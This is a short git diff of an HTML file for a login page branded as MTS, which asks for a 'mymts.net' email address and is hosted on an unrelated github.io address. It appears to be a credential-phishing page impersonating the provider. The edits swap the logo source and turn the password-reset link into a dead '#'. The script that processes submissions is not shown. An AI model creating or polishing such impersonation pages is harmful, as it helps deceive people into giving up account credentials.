--- a/index.html
+++ b/index.html
@@ -16,7 +16,7 @@
         <form id="form" name="sentMessage" novalidate="novalidate">
             <input name="__original_url" type="hidden" value="https://nul-01a.github.io/"/>
             <div class="logo">
-                <img src="https://download.logo.wine/logo/Bell_Internet/Bell_Internet-Logo.wine.png" alt="MTS Logo" />
+                <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTS8xl8WA9QeD6PNO8WZdjNTyi8I_kUnVzYqQ&s" alt="MTS Logo" />
                 <p>Log in with your mymts.net email address</p>
             </div>
             <div class="container">
@@ -29,11 +29,11 @@
                 </div>
                 <button class="btn" id="button" type="submit">LOG IN</button>
                 <div class="register-link">
-                    <input type="checkbox" /> <span>Remember Me</span> <a href="https://nul-01a.github.io/">Forgot Password?</a>
+                    <input type="checkbox" /> <span>Remember Me</span> <a href="#">Forgot Password?</a>
                 </div>
             </div>
         </form>
     </div>
-    <script src="script.js"></script> <!-- Ensure script.js is included after the form -->
+    <script src="script.js"></script> 
 </body>
 </html>
